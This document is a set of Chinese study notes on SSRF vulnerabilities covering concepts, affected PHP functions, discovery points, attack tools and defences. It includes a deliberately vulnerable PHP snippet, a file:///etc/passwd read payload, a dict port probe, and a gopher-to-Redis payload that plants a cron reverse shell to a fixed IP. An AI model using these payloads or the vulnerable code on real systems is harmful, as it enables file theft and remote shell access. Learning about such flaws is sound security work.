服务器请求伪造SSRF漏洞

服务器请求伪造SSRF漏洞

内容为学习笔记，如有侵权，联系删除

SSRF漏洞之概念

定义：SSRF Server-Side Request Forgery服务器端请求伪造：是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

自我浅显理解：攻击者在能显示转到百度等界面的url里实现了访问其他网站，也可以探测端口，文件读取，反弹shell，内网渗透等，与xml或url跳转不同，该漏洞使用的是他人服务器的身份进行的请求伪造，url跳转是请求者的身份，XXE是引入了一个外部的实体，CSRF是有一个第三方的网站使用用户的身份请求伪造。

示例代码：

<?php
function curl($url){  
    $ch = curl_init();
    // 设置URL和相应的选项
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0); // 启用时会将头文件的信息作为数据流输出  
    // 抓取URL并把它传递给浏览器  
    curl_exec($ch);
    //关闭cURL资源，并且释放系统资源  
    curl_close($ch);
}

$url = $_GET['url'];
curl($url);  
?>

主要是curl_exec()函数造成的漏洞，curl是一个在命令行下工作的文件传输工具，可以使用终端curl www.baidu.com命令获取百度网页内容信息。

在php配置文件php.ini有一个设置，extension=php_curl.dll默认开启,功能是：

• 获取网页资源——爬虫
• webservice——获取接口数据
• FTP——下载文件

同时也就支持了ssrf漏洞相关获取信息的操作

主要使用curl_exec()函数实现

SSRF漏洞之相关函数协议

可能引起SSRF漏洞的相关函数php

函数	作用
curl_exec()	执行 cURL 会话
file_get_contents()	将整个文件读入一个字符串
fsockopen()	打开一个网络连接或者一个Unix套

可使用的php协议

协议	作用	payload
file	任意文件读取	curl -v ‘file:///etc/passwd’
dict	探测端口	http://localhost/ssrf/ssrf1.php?url=dict://127.0.0.1:3306
gopher	执行命令、反弹shell等	curl\v’gopher://127.0.0.1:6379/_3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a/1 * * * * bash -i>&/dev/tcp/192.168.142.135/44440>&1%0a%0a%0a%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a4%0d%0a$6%0d%0aconfig%0%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a1%0d%0a$4%0d%0asave%0d%0a1%0d%0a$4%0d%0aquit%0d%0a’

dict协议：用于搭建在线字典服务

gopher协议：是一种信息查找系统，只支持文本，不支持图像，已被HTTP替代

SSRF漏洞之危害

• 1、扫描资产（扫端口等）
• 2、获取敏感信息（读文件）
• 3、攻击内网服务器（使用目标用户身份，绕过防火墙）
• 4、访问大文件，造成溢出（服务器崩溃）
• 5、通过Redis等写入WebShell或建立反弹连接（提权）

SSRF漏洞之发掘漏洞

一个服务器或网页加载或读取了其他网页的内容，就可能出现SSRF漏洞，验证就是去构造让其访问的网址信息之类的访问了就说明存在漏洞

• 社会化分享的功能

  比如某网页分享该网页的内容，有一个分享到的窗口，就必然解析加载其他网页社交网页的信息，分享到人人网微博等，就有加载该网页信息的功能，那么就可能存在SSRF漏洞。

• 转码服务

  网页与手机等比例不适应，会进行一个转码后再加载出来，那么在转码过程中必然会解析目标网站，然后重构加载，那么久可能存在SSRF漏洞

• 在线翻译的服务

  在线翻译可以进行全屏翻译，那么翻译过程也就必然是对目标网址进行解析翻译重新加载，那么久可能存在SSRF漏洞

• 在线的图片有上传下载和加载功能

  有些图片加载下载界面可以读取远程的图片加载，那么读取远程网页仓库图片时也要进行解析，就存在了SSRF漏洞

• 图片文章收藏功能

  收藏后能自动加载标题等，那么其过程也就是解析了加载的内容，那么就可能存在了SSRF漏洞

• 网站采集抓取的功能

  让用户输入，去采集或抓取目标内容

如何去找这些点

• 爬取地址
• 查看是否请求了其他资源
• 也可以用Google语法搜索关键字：share、wap、url、link、src、source、target、u、3g、display、sourceURL、imageURL、domain
• 代码审计

工具检测

SSRF-Testing：https://github.com/cujanovic/SSRF-Testing

Gopherus：https://github.com/tarunkant/Gopherus

SSRFmap：https://github.com/swisskyrepo/SSRFmap—直接进行已知SSRF漏洞然后进行攻击的工具

ssrf_proxy：https://github.com/bcoles/ssrf_proxy

SSRF漏洞之防御

• 1、禁用协议：只用http协议的话就禁掉dict、gopher协议
• 2、限制请求端口：只访问需要的端口，其他的禁掉
• 3、设置URL白名单：只访问需要的URL
• 4、过滤返回信息：加载图片的就只返回图片信息，其他的都过滤掉
• 5、统一错误信息：当错误时，统一错误，不显示其他内容将错误信息封装